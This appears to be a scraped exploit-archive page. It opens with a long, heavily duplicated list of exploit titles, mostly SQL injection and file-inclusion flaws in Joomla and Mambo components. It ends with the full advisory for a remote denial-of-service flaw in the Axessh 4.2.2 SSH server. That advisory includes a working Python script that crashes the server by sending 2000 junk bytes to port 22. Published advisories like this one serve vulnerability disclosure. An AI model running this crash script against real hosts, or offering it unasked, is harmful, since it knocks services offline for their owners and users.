1edbc5ecc4
14 new exploits Microsoft Windows - Metafile (.WMF) Remote File Download Exploit Generator Microsoft Windows - Metafile '.WMF' Arbitrary File Download (Generator) Redaxo CMS 3.2 - 'INCLUDE_PATH' Remote File Inclusion Redaxo 3.2 - 'INCLUDE_PATH' Remote File Inclusion Mambo Component com_loudmouth 4.0j - Remote File Inclusion Mambo Component com_loudmouth 4.0j - Remote File Inclusion Sisfo Kampus 2006 - 'dwoprn.php f' Remote File Download Sisfo Kampus 2006 - 'dwoprn.php f' Arbitrary File Download Mambo Component 'com_newsletter' 4.5 - 'listid' Parameter SQL Injection Mambo Component 'com_newsletter' 4.5 - 'listid' Parameter SQL Injection Joomla! / Mambo Component com_catalogproduction - 'id' SQL Injection Joomla! / Mambo Component 'com_catalogproduction' - 'id' SQL Injection Megacubo 5.0.7 - (mega://) Remote File Download and Execute Exploit Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute DMXReady SDK 1.1 - Remote File Download DMXReady SDK 1.1 - Arbitrary File Download Joomla! 1.5.12 RCE via TinyMCE - Arbitrary File Upload Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload) Joomla! Component Jw_allVideos - Remote File Download Joomla! Component Jw_allVideos - Arbitrary File Download Trouble Ticket Software - ttx.cgi Remote File Download Trouble Ticket Software - 'ttx.cgi' Arbitrary File Download Redaxo CMS 4.2.1 - Remote File Inclusion Redaxo 4.2.1 - Remote File Inclusion Joomla! Component Music Manager - Local File Inclusion Joomla! Component 'Music Manager' - Local File Inclusion Joomla! Component NeoRecruit (com_neorecruit Itemid) - Blind SQL Injection Joomla! Component 'com_neorecruit' - 'Itemid' Parameter Blind SQL Injection Joomla! Component artforms 2.1b7.2 rc2 - Multiple Vulnerabilities Joomla! Component PaymentsPlus - Mtree 2.1.5 - Blind SQL Injection Joomla! Component 'com_artforms' 2.1b7.2 rc2 - Multiple Vulnerabilities Joomla! Component 'PaymentsPlus' 2.1.5 - Blind SQL Injection Joomla! Component Minify4Joomla! - Arbitrary File Upload / Persistent Cross-Site Scripting Joomla! Component IXXO Cart - SQL Injection Joomla! Component com_jomtube - (user_id) Blind SQL Injection / SQL Injection Joomla! Component redSHOP 1.0 (com_redshop pid) - SQL Injection Joomla! Component QuickFAQ (com_quickfaq) - Blind SQL Injection Joomla! Component 'Minify4Joomla' - Arbitrary File Upload / Persistent Cross-Site Scripting Joomla! Component 'IXXO Cart' - SQL Injection Joomla! Component 'com_jomtube' - 'user_id' Parameter Blind SQL Injection Joomla! Component 'com_redshop' 1.0 - 'pid' Parameter SQL Injection Joomla! Component 'com_quickfaq' - Blind SQL Injection Joomla! Component MyHome (com_myhome) - Blind SQL Injection Joomla! Component MySms (com_mysms) - Arbitrary File Upload Joomla! Component Health & Fitness Stats - Persistent Cross-Site Scripting Joomla! Component 'com_myhome' - Blind SQL Injection Joomla! Component 'com_mysms' - Arbitrary File Upload Joomla! Component 'healthstats' - Persistent Cross-Site Scripting Joomla! Component Rapid Recipe - Persistent Cross-Site Scripting Joomla! Component 'Rapid-Recipe' - Persistent Cross-Site Scripting Joomla! Component EasyBlog - Persistent Cross-Site Scripting Joomla! Component 'EasyBlog' - Persistent Cross-Site Scripting Joomla! Component QContacts (com_qcontacts) - SQL Injection Joomla! Component 'com_qcontacts' - SQL Injection Joomla! Component RedShop 1.0.23.1 - Blind SQL Injection Joomla! Component 'com_redshop' 1.0.23.1 - Blind SQL Injection Joomla! Component com_spa - SQL Injection (2) Joomla! Component com_staticxt - SQL Injection Joomla! Component 'com_spa' - SQL Injection (2) Joomla! Component 'com_staticxt' - SQL Injection Joomla! Component com_spa - SQL Injection (1) Joomla! Component 'com_spa' - SQL Injection (1) Joomla! Component com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta - SQL Injection Joomla! Component com_huruhelpdesk - SQL Injection Joomla! Component com_iproperty - SQL Injection Joomla! Component 'com_golfcourseguide' 0.9.6.0 - SQL Injection Joomla! Component 'com_huruhelpdesk' - SQL Injection Joomla! Component 'com_iproperty' - SQL Injection Joomla! Component Ozio Gallery (com_oziogallery) - SQL Injection Joomla! Component ITArmory (com_itarmory) - SQL Injection Joomla! Component 'com_oziogallery' - SQL Injection Joomla! Component 'com_itarmory' - SQL Injection Joomla! Component com_joomdle) 0.24 - SQL Injection Joomla! Component com_youtube - SQL Injection Joomla! Component 'com_joomdle' 0.24 - SQL Injection Joomla! Component 'com_youtube' - SQL Injection Joomla! Component com_Joomla-visites - Remote File Inclusion Joomla! Component 'com_Joomla-visites' - Remote File Inclusion Joomla! Component TTVideo 1.0 - SQL Injection Joomla! Component 'com_ttvideo' 1.0 - SQL Injection Joomla! Component appointinator 1.0.1 - Multiple Vulnerabilities Joomla! Component 'com_appointinator' 1.0.1 - Multiple Vulnerabilities Joomla! Component PhotoMap Gallery 1.6.0 - Multiple Blind SQL Injections Joomla! Component com_photomapgallery 1.6.0 - Multiple Blind SQL Injections Joomla! Component com_beamospetition - SQL Injection Joomla! Component 'com_beamospetition' - SQL Injection Caedo HTTPd Server 0.5.1 ALPHA - Remote File Download Caedo HTTPd Server 0.5.1 ALPHA - Arbitrary File Download Joomla! Component 1.0 'com_jdownloads' - Arbitrary File Upload Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload ADA IMGSVR 0.4 - Remote File Download ADA IMGSVR 0.4 - Arbitrary File Download Joomla! / Mambo Component com_buslicense - 'aid' Parameter SQL Injection Joomla! / Mambo Component 'com_buslicense' - 'aid' Parameter SQL Injection Joomla! / Mambo Component com_sermon 0.2 - 'gid' Parameter SQL Injection Joomla! / Mambo Component 'com_sermon' 0.2 - 'gid' Parameter SQL Injection Joomla! / Mambo Component com_comments 0.5.8.5g - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_comments' 0.5.8.5g - 'id' Parameter SQL Injection Joomla! / Mambo Component com_iomezun - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_iomezun' - 'id' Parameter SQL Injection Joomla! / Mambo Component com_Joomlavvz - 'id' Parameter SQL Injection Joomla! / Mambo Component com_most - 'secid' Parameter SQL Injection Joomla! / Mambo Component com_asortyment - 'katid' Parameter SQL Injection Joomla! / Mambo Component 'com_Joomlavvz' - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_most' - 'secid' Parameter SQL Injection Joomla! / Mambo Component 'com_asortyment' - 'katid' Parameter SQL Injection Joomla! / Mambo Component com_model - 'objid' Parameter SQL Injection Joomla! / Mambo Component com_omnirealestate - 'objid' Parameter SQL Injection Joomla! / Mambo Component 'com_model' - 'objid' Parameter SQL Injection Joomla! / Mambo Component 'com_omnirealestate' - 'objid' Parameter SQL Injection Joomla! / Mambo Component com_smslist - 'listid' Parameter SQL Injection Joomla! / Mambo Component com_activities - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_smslist' - 'listid' Parameter SQL Injection Joomla! / Mambo Component 'com_activities' - 'id' Parameter SQL Injection Joomla! / Mambo Component com_lexikon - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_lexikon' - 'id' Parameter SQL Injection Joomla! / Mambo Component com_team - SQL Injection Joomla! / Mambo Component com_iigcatalog - 'cat' Parameter SQL Injection Joomla! / Mambo Component com_formtool - 'catid' Parameter SQL Injection Joomla! / Mambo Component com_genealogy - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_team' - SQL Injection Joomla! / Mambo Component 'com_iigcatalog' - 'cat' Parameter SQL Injection Joomla! / Mambo Component 'com_formtool' - 'catid' Parameter SQL Injection Joomla! / Mambo Component 'com_genealogy' - 'id' Parameter SQL Injection Joomla! / Mambo Component com_hello_world - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_hello_world' - 'id' Parameter SQL Injection Joomla! / Mambo Component com_publication - 'pid' Parameter SQL Injection Joomla! / Mambo Component com_blog - 'pid' Parameter SQL Injection Joomla! / Mambo Component 'com_publication' - 'pid' Parameter SQL Injection Joomla! / Mambo Component 'com_blog' - 'pid' Parameter SQL Injection Joomla! / Mambo Component com_wines 1.0 - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_wines' 1.0 - 'id' Parameter SQL Injection Joomla! / Mambo Component com_inter - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_inter' - 'id' Parameter SQL Injection Joomla! / Mambo Component com_guide - 'category' Parameter SQL Injection Joomla! / Mambo Component 'com_guide' - 'category' Parameter SQL Injection Joomla! / Mambo Component com_is 1.0.1 - Multiple SQL Injections Joomla! / Mambo Component 'com_is' 1.0.1 - Multiple SQL Injections Joomla! / Mambo Component com_utchat 0.2 - Multiple Remote File Inclusion Joomla! / Mambo Component 'com_utchat' 0.2 - Multiple Remote File Inclusion Vana CMS - 'Filename' Parameter Remote File Download Vana CMS - 'Filename' Parameter Arbitrary File Download Joomla! Component Rapid-Recipe - HTML Injection Joomla! Component 'Rapid-Recipe' - HTML Injection Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection Joomla! Component 'FreiChat' 1.0/2.x - Unspecified HTML Injection REDAXO - 'subpage' Parameter Cross-Site Scripting Redaxo CMS 5.0.0 - Multiple Vulnerabilities Redaxo 5.0.0 - Multiple Vulnerabilities DarkComet Server - Remote File Download Exploit (Metasploit) DarkComet Server - Arbitrary File Download (Metasploit) WinaXe 7.7 'FTP client' - Remote Buffer Overflow Rapid PHP Editor 14.1 - Remote Command Execution Memcached 1.4.33 - PoC (1) Memcached 1.4.33 - PoC (2) Memcached 1.4.33 - PoC (3) SweetRice 1.5.1 - Arbitrary File Download Axessh 4.2 - Denial Of Service SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution ETchat 3.7 - Cross-Site Request Forgery sNews 1.7.1 - Cross-Site Request Forgery sNews 1.7.1 - Arbitrary File Upload PCMan FTP Server 2.0.7 - 'ACCT' Command Buffer Overflow nodCMS - Cross-Site Request Forgery Redaxo 5.2.0 - Cross-Site Request Forgery
85 lines
No EOL
2.5 KiB
Text
Executable file
85 lines
No EOL
2.5 KiB
Text
Executable file
[+] Credits: John Page aka hyp3rlinx
|
|
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
|
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt
|
|
|
|
[+] ISR: ApparitionSec
|
|
|
|
|
|
|
|
Vendor:
|
|
============
|
|
www.labf.com
|
|
|
|
|
|
|
|
Product:
|
|
=============
|
|
Axessh 4.2.2
|
|
|
|
Axessh is a SSH client. It is a superb terminal emulator/telnet client for Windows. It provides SSH capabilities to Axessh without
|
|
sacrificing any of existing functionality. Furthermore, Axessh has been developed entirely outside of the USA, and can be sold
|
|
anywhere in the world (apart from places where people aren't allowed to own cryptographic software).
|
|
|
|
2. Axessh features include:
|
|
Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4)
|
|
Compatible with SSH protocol version 1.5
|
|
Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4
|
|
Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, AES256-cbc
|
|
Authentication using password
|
|
Authentication RSA
|
|
Compression support
|
|
Connection forwarding, including full support for X-protocol connection forwarding
|
|
"Dynamic Forwarding" which provides other tasks on the same PC with requested port forwarding
|
|
|
|
|
|
|
|
Vulnerability Type:
|
|
====================
|
|
Denial Of Service
|
|
|
|
AxeSSH will crash after receiving a overly long payload of junk...
|
|
|
|
|
|
|
|
Exploit code(s):
|
|
===============
|
|
|
|
1) Open the settings window for axessh and choose Run then click Run as EXE, this will launch "xwpsshd.exe"
|
|
crashes with bad protocol version.
|
|
|
|
|
|
import socket
|
|
|
|
print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"
|
|
|
|
ip = raw_input("[IP]> ")
|
|
port = 22
|
|
payload="A"*2000
|
|
s=socket.create_connection((ip,port))
|
|
s.send(payload)
|
|
|
|
|
|
|
|
Exploitation Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
|
|
Severity Level:
|
|
================
|
|
Medium
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
|
or exploits by the author or elsewhere.
|
|
|
|
hyp3rlinx |